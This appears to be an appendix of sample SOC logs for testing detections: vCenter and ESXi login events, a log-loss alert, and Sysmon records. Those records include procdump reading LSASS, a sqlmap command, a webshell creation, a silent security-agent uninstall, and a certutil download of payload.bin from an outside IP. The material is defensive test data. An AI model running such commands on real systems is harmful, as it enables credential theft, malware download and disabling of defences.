soc/samples/appendix-b-p...

# Appendix B - production-style sample logs

# B1-01 vCenter failed login
2026-03-09T10:20:31.492Z vcsa01 vpxd[29721]: Event [9023141] [1-1] [vim.event.BadUsernameSessionEvent] [error] [VSPHERE.LOCAL\\administrator] [Login failure for user from 198.51.100.33]

# B1-02 ESXi SSH enabled
2026-03-09T10:20:55.017Z esxi-01 hostd: User root@127.0.0.1 changed setting: SSH login is enabled

# B1-03 ESXi SSH auth activity
2026-03-09T10:21:12.161Z esxi-01 sshd[4123010]: Failed password for root from 203.0.113.42 port 53770 ssh2
2026-03-09T10:21:27.941Z esxi-01 sshd[4123012]: Accepted password for root from 203.0.113.42 port 53811 ssh2

# B2-01 log loss detection from SOC Integrator
soc_event=correlation event_type=log_loss_detection stream=fortigate expected_min=10 observed=0 window_min=5 severity=warning

# B3-01 Sysmon LSASS access
{"win":{"system":{"eventID":"10"},"eventdata":{"targetImage":"C:\\Windows\\System32\\lsass.exe","sourceImage":"C:\\Tools\\procdump.exe"}}}

# B3-02 SQLi keywords in process cmdline
{"win":{"system":{"eventID":"1"},"eventdata":{"commandLine":"cmd.exe /c sqlmap --risk=3 --batch --sql-query=select * from users"}}}

# B3-03 webshell file created
{"win":{"system":{"eventID":"11"},"eventdata":{"targetFilename":"C:\\inetpub\\wwwroot\\shell.aspx"}}}

# B3-04 security agent uninstall via msiexec
{"win":{"system":{"eventID":"1"},"eventdata":{"commandLine":"msiexec /x {D23A1B7F-231D-4502-9B00-123456789ABC} /qn"}}}

# B3-05 Task Manager touching LSASS
{"win":{"system":{"eventID":"10"},"eventdata":{"sourceImage":"C:\\Windows\\System32\\Taskmgr.exe","targetImage":"C:\\Windows\\System32\\lsass.exe"}}}

# B3-06 certutil execution
{"win":{"system":{"eventID":"1"},"eventdata":{"image":"C:\\Windows\\System32\\certutil.exe","commandLine":"certutil -urlcache -split -f http://198.51.100.22/payload.bin payload.bin"}}}